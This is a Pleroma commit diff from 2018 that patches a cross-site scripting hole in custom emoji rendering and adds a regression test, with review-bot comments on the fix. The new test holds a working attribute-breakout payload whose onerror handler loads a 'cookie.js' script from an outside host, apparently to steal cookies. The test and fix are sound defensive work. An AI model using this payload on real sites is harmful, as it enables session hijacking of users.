commit: 3370fab1d0af1eb65c6d7f8422129b33ca4c654b
parent: 3c7280934e3bdca8d5a870dc932406ccd9915d64
Author: kaniini <nenolod@gmail.com>
Date:   Sun,  2 Sep 2018 00:08:56 +0000

Merge branch 'security/emoji-xss' into 'develop'

formatter: don't add XSS emoji

See merge request pleroma/pleroma!322

Diffstat:

Mlib/pleroma/formatter.ex1+
Mtest/formatter_test.exs17++++++++++++++++-
Mtest/web/twitter_api/representers/activity_representer_test.exs2+-
Mtest/web/twitter_api/views/user_view_test.exs2+-
4 files changed, 19 insertions(+), 3 deletions(-)

diff --git a/lib/pleroma/formatter.ex b/lib/pleroma/formatter.ex
@@ -154,6 +154,7 @@ defmodule Pleroma.Formatter do
 MediaProxy.url(file)
 }' />"
 )
+ |> HtmlSanitizeEx.basic_html()
 end)
 end
diff --git a/test/formatter_test.exs b/test/formatter_test.exs
@@ -189,11 +189,26 @@ defmodule Pleroma.FormatterTest do
 text = "I love :moominmamma:"
 expected_result =
- "I love <img height='32px' width='32px' alt='moominmamma' title='moominmamma' src='/finmoji/128px/moominmamma-128.png' />"
+ "I love <img height=\"32px\" width=\"32px\" alt=\"moominmamma\" title=\"moominmamma\" src=\"/finmoji/128px/moominmamma-128.png\" />"
 assert Formatter.emojify(text) == expected_result
 end
+ test "it does not add XSS emoji" do
+ text =
+ "I love :'onload=\"this.src='bacon'\" onerror='var a = document.createElement(\"script\");a.src=\"//51.15.235.162.xip.io/cookie.js\";document.body.appendChild(a):"
+
+ custom_emoji = %{
+ "'onload=\"this.src='bacon'\" onerror='var a = document.createElement(\"script\");a.src=\"//51.15.235.162.xip.io/cookie.js\";document.body.appendChild(a)" =>
+ "https://placehold.it/1x1"
+ }
+
+ expected_result =
+ "I love <img height=\"32px\" width=\"32px\" alt=\"\" title=\"\" src=\"https://placehold.it/1x1\" />"
+
+ assert Formatter.emojify(text, custom_emoji) == expected_result
+ end
+
 test "it returns the emoji used in the text" do
 text = "I love :moominmamma:"
diff --git a/test/web/twitter_api/representers/activity_representer_test.exs b/test/web/twitter_api/representers/activity_representer_test.exs
@@ -126,7 +126,7 @@ defmodule Pleroma.Web.TwitterAPI.Representers.ActivityRepresenterTest do
 }
 expected_html =
- "<p>2hu</p>alert('YAY')Some <img height='32px' width='32px' alt='2hu' title='2hu' src='corndog.png' /> content mentioning <a href=\"#{
+ "<p>2hu</p>alert('YAY')Some <img height=\"32px\" width=\"32px\" alt=\"2hu\" title=\"2hu\" src=\"corndog.png\" /> content mentioning <a href=\"#{
 mentioned_user.ap_id
 }\">@shp</a>"
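Review bot: The added `|> HtmlSanitizeEx.basic_html()` in lib/pleroma/formatter.ex runs the sanitizer over the whole accumulated text after each emoji substitution, instead of constraining the untrusted part — the emoji name that is interpolated into the `alt`/`title` attributes and the `src` URL. Because the sanitizer re-serializes all markup, unrelated output changes (the quote style in the three other test files had to be updated in this same commit) and the work is repeated once per emoji matched, while the unescaped name is still spliced into the tag and only repaired afterwards. A tighter fix would validate or escape the name before building the tag, e.g. match the emoji key against an allowlist such as `~r/^[a-zA-Z0-9_-]+$/` and skip any key that fails, keeping the sanitizer as a second line of defence if desired. The enclosing function (presumably `emojify/2`, judging by the tests; the `end)` suggests this sits inside an anonymous function passed to a reduce) starts before this hunk, so I can't see whether the key is already checked upstream.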
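Review bot: The new test in test/formatter_test.exs pins the sanitizer's exact serialization (`alt=\"\" title=\"\"`, double-quoted attributes) rather than the security property, so a change in HtmlSanitizeEx output formatting will fail it without telling a reader whether the attribute breakout is still blocked. Add a property assertion beside the equality, e.g. `refute Formatter.emojify(text, custom_emoji) =~ "onerror"` and `refute Formatter.emojify(text, custom_emoji) =~ "onload"`, so the intent survives formatting changes. The fixture also embeds an external-looking host (`51.15.235.162.xip.io`) in the payload; a reserved name such as `example.com` keeps test data from pointing at a real address. A one-line comment above the test naming the case being covered (a crafted emoji shortcode breaking out of the `<img>` attribute) would make the unusual input self-explanatory.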
diff --git a/test/web/twitter_api/views/user_view_test.exs b/test/web/twitter_api/views/user_view_test.exs
@@ -22,7 +22,7 @@ defmodule Pleroma.Web.TwitterAPI.UserViewTest do
 test "A user with emoji in username", %{user: user} do
 expected =
- "<img height='32px' width='32px' alt='karjalanpiirakka' title='karjalanpiirakka' src='/file.png' /> man"
+ "<img height=\"32px\" width=\"32px\" alt=\"karjalanpiirakka\" title=\"karjalanpiirakka\" src=\"/file.png\" /> man"
 user = %{ user